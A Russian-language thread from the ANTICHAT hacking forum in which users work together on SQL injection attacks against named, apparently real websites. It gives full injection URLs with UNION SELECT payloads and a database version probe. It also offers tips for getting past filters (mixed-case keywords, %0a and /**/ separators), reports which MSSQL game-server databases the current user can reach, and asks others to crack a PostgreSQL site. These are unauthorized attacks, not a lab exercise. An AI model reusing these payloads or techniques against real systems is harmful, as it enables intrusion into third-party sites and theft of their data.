ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?

мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?

нету там фильтра на from
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+IN FORMATION_SCHEMA.TABLES--

Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select.
Версия пятая.

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline= 141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2

что можно сделать? Очень нужен совет.

@Imperou$
у меня Forbidden, попробуй регистрт UnIoN+sElEcT или union%0aselect

хоть я не очень дружу с MSSQL но так на вскидку:
смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть):
lin2world - 1
master - 1
tempdb - 1
model - 0
msdb - 1
lin2db - 0
lin2comm - 0
l2gloss - 0
lin2world - 1
lin2log - 0
lin2clancomm - 0
смотрим таблички и колонки доступные текушему пользователю
крч ничего особено хорошего нету.

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2

5.0.67-community



С ними работает сервер линейки я же написал. Сайт вообще мог бы быть построен на mysql и не иметь никакого отношения к л2 серверу. Впрочем иногда бывает что данные для статистики (как правило подробной, например в личном кабинете - содержимое инвентаря, количество пвп\пк) берется прямо из этих баз... здесь как видишь доступа к этим базам нету

ElteRUS я невнимательный идиот.Спасибо большое, а ларчик просто открывался

http://www.customoutfitters.com/co_home/products.php?productCat=4

Стоит PostgreSql.Кто может раскрутить ? На все запросы к бд реагирует молча =_=